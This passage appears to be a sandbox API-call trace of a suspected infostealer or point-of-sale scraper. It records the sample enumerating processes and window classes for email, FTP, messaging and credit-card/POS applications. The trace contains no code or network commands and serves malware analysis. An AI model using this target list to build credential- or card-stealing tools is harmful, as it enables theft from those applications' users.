lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0089.843] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0089.845] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0089.846] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0089.848] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0089.856] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0089.858] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0089.859] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0089.861] Process32Next (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0092.312] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6d4 [0092.324] Process32First (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6d4 [0101.523] Process32First (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.953] Process32First (in: hSnapshot=0x6d4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.166] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xafc [0122.177] Process32First (in: hSnapshot=0xafc, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.295] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1408 [0130.306] Process32First (in: hSnapshot=0x1408, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0132.999] Process32First (in: hSnapshot=0x1408, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1060 [0146.004] Process32First (in: hSnapshot=0x1060, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.768] Process32First (in: hSnapshot=0x1060, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.662] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb64 [0154.673] Process32First (in: hSnapshot=0xb64, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.713] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb64 [0161.718] Process32First (in: hSnapshot=0xb64, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0172.404] Process32First (in: hSnapshot=0xbc0, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0176.036] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xb64 [0176.044] Process32First (in: hSnapshot=0xb64, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0178.621] Process32First (in: hSnapshot=0xb64, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0186.642] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x7e8 [0186.652] Process32First (in: hSnapshot=0x7e8, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.644] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14c4 [0204.657] Process32First (in: hSnapshot=0x14c4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0214.444] Process32First (in: hSnapshot=0x14c4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.225] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xea4 [0232.235] Process32First (in: hSnapshot=0xea4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.992] Process32First (in: hSnapshot=0xea4, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0244.877] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x874 [0244.888] Process32First (in: hSnapshot=0x874, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0250.263] Process32First (in: hSnapshot=0x250, lppe=0x842fcc0 | out: lppe=0x842fcc0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 41 os_tid = 0xec8 [0089.074] EnumWindows (lpEnumFunc=0x36c3dd0, lParam=0x27a0000) returned 1 [0089.076] GetClassNameA (in: hWnd=0x30122, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0089.076] GetClassNameA (in: hWnd=0x300ac, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.076] GetClassNameA (in: hWnd=0x300b0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.076] GetClassNameA (in: hWnd=0x400a4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0089.077] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0089.077] GetClassNameA (in: hWnd=0x10070, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x10086, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x10078, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x10076, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x10072, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x10052, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Button") returned 6 [0089.077] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0089.077] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x50092, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.077] GetClassNameA (in: hWnd=0x10088, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0089.077] GetClassNameA (in: hWnd=0x10268, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Military_mission_finish_window") returned 30 [0089.077] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0089.077] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="notepad_class") returned 13 [0089.077] GetClassNameA (in: hWnd=0x10298, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="operamailclass") returned 14 [0089.077] GetClassNameA (in: hWnd=0x10296, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="outlook_window") returned 14 [0089.078] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="omniposclass") returned 12 [0089.078] GetClassNameA (in: hWnd=0x10294, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="pidgin_window") returned 13 [0089.078] GetClassNameA (in: hWnd=0x10292, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="scriptftp_wnd") returned 13 [0089.078] GetClassNameA (in: hWnd=0x10290, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="skypeclass") returned 10 [0089.078] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="smartftp") returned 8 [0089.078] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="thunderbird_") returned 12 [0089.078] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="trillianwnd") returned 11 [0089.078] GetClassNameA (in: hWnd=0x10288, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="webdrivewin") returned 11 [0089.078] GetClassNameA (in: hWnd=0x10286, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="whatsapp_window") returned 15 [0089.078] GetClassNameA (in: hWnd=0x10284, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="winscpapp") returned 9 [0089.078] GetClassNameA (in: hWnd=0x10282, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="yahoomessengerclass") returned 19 [0089.078] GetClassNameA (in: hWnd=0x10280, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="foxmailincmailapp") returned 17 [0089.078] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="fling_win") returned 9 [0089.078] GetClassNameA (in: hWnd=0x20222, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="gmailnotifierpro_wnd") returned 20 [0089.078] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="flashfxpwindow") returned 14 [0089.079] GetClassNameA (in: hWnd=0x2021e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="icqcls") returned 6 [0089.079] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="filezilla_class") returned 15 [0089.079] GetClassNameA (in: hWnd=0x10278, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="farwin") returned 6 [0089.079] GetClassNameA (in: hWnd=0x10276, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="coreftpapp") returned 10 [0089.079] GetClassNameA (in: hWnd=0x10274, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="bitkinexapp") returned 11 [0089.079] GetClassNameA (in: hWnd=0x10272, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="barcaapp") returned 8 [0089.079] GetClassNameA (in: hWnd=0x10270, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="alftpwnd") returned 8 [0089.079] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="absolutetelnetwin") returned 17 [0089.079] GetClassNameA (in: hWnd=0x1026a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="3dftp") returned 5 [0089.079] GetClassNameA (in: hWnd=0x300e0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.079] GetClassNameA (in: hWnd=0x300b8, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0089.079] GetClassNameA (in: hWnd=0x300de, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0089.079] GetClassNameA (in: hWnd=0x300c4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.079] GetClassNameA (in: hWnd=0x300f2, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.079] GetClassNameA (in: hWnd=0x400ae, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.079] GetClassNameA (in: hWnd=0x300a2, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0089.079] GetClassNameA (in: hWnd=0x10266, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="unit_wnd") returned 8 [0089.079] GetClassNameA (in: hWnd=0x10264, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="spcwin_") returned 7 [0089.080] GetClassNameA (in: hWnd=0x10262, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="spgagentservice_app") returned 19 [0089.080] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="utg2win") returned 7 [0089.080] GetClassNameA (in: hWnd=0x1025c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="accuposapp") returned 10 [0089.080] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="aldelowin") returned 9 [0089.080] GetClassNameA (in: hWnd=0x10258, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="afr38_cls") returned 9 [0089.080] GetClassNameA (in: hWnd=0x10248, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="isspos_class") returned 12 [0089.080] GetClassNameA (in: hWnd=0x10256, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="centralcreditcardwindow") returned 23 [0089.080] GetClassNameA (in: hWnd=0x10254, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="creditservice_win") returned 17 [0089.080] GetClassNameA (in: hWnd=0x10252, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="fpos_class") returned 10 [0089.080] GetClassNameA (in: hWnd=0x30224, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="mxslipstreamcls") returned 15 [0089.080] GetClassNameA (in: hWnd=0x10250, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="leechftpcls") returned 11 [0089.080] GetClassNameA (in: hWnd=0x1024e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="ncftp_window") returned 12 [0089.080] GetClassNameA (in: hWnd=0x10246, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="active-chargewindow") returned 19 [0089.080] GetClassNameA (in: hWnd=0x10244, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="edcsvr_app") returned 10 [0089.080] GetClassNameA (in: hWnd=0x20220, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="ccv_server_cls") returned 14 [0089.080] GetClassNameA (in: hWnd=0x10204, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Four_win") returned 8 [0089.080] GetClassNameA (in: hWnd=0x10202, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="treatmentaboutcls") returned 17 [0089.080] GetClassNameA (in: hWnd=0x10200, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="focus_memory_base_window") returned 24 [0089.080] GetClassNameA (in: hWnd=0x201f6, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Mr_Us_cls") returned 9 [0089.080] GetClassNameA (in: hWnd=0x201f0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="land_Be_Area_wnd") returned 16 [0089.081] GetClassNameA (in: hWnd=0x1021c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="future_Employee_wnd") returned 19 [0089.081] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="wrongcls") returned 8 [0089.081] GetClassNameA (in: hWnd=0x10206, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Treatclass") returned 10 [0089.081] GetClassNameA (in: hWnd=0x201fe, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="offer_Shot_class") returned 16 [0089.081] GetClassNameA (in: hWnd=0x10218, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="surface_cls") returned 11 [0089.081] GetClassNameA (in: hWnd=0x201f8, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Minute_majority_Recognize_class") returned 31 [0089.081] GetClassNameA (in: hWnd=0x10216, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Quickly_Mention_learn_class") returned 27 [0089.081] GetClassNameA (in: hWnd=0x10214, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Totalwindow") returned 11 [0089.081] GetClassNameA (in: hWnd=0x201ee, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Stateclass") returned 10 [0089.081] GetClassNameA (in: hWnd=0x10210, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="our_Available_Watch_wnd") returned 23 [0089.081] GetClassNameA (in: hWnd=0x1020c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Reality_") returned 8 [0089.081] GetClassNameA (in: hWnd=0x201fa, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="few_app") returned 7 [0089.081] GetClassNameA (in: hWnd=0x201f4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="at_effort_app") returned 13 [0089.081] GetClassNameA (in: hWnd=0x201fc, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="shoot_decade_Effect_class") returned 25 [0089.081] GetClassNameA (in: hWnd=0x101e8, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.081] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.081] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.081] GetClassNameA (in: hWnd=0x10182, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.081] GetClassNameA (in: hWnd=0x10180, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.081] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.082] GetClassNameA (in: hWnd=0x10170, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.082] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0089.082] GetClassNameA (in: hWnd=0x30152, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0089.082] GetClassNameA (in: hWnd=0x201e4, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.082] GetClassNameA (in: hWnd=0x101e0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0089.082] GetClassNameA (in: hWnd=0x201de, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0089.082] GetClassNameA (in: hWnd=0x201d2, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="ATL:733658F8") returned 12 [0089.082] GetClassNameA (in: hWnd=0x101bc, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.082] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.082] GetClassNameA (in: hWnd=0x2018a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.082] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0089.082] GetClassNameA (in: hWnd=0x10158, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0089.082] GetClassNameA (in: hWnd=0x10154, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0089.082] GetClassNameA (in: hWnd=0x10150, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.082] GetClassNameA (in: hWnd=0x20140, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0089.082] GetClassNameA (in: hWnd=0x10134, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0089.082] GetClassNameA (in: hWnd=0x10132, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0089.082] GetClassNameA (in: hWnd=0x20128, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0089.083] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0089.083] GetClassNameA (in: hWnd=0x10114, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="ATL:000007FEFBCD41F0") returned 20 [0089.083] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0089.083] GetClassNameA (in: hWnd=0x10108, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.083] GetClassNameA (in: hWnd=0x60094, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0089.083] GetClassNameA (in: hWnd=0x10100, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.083] GetClassNameA (in: hWnd=0x100fa, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.083] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.083] GetClassNameA (in: hWnd=0x5008a, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0089.083] GetClassNameA (in: hWnd=0x10080, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0089.083] GetClassNameA (in: hWnd=0x2007e, lpClassName=0x5d7f7c0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 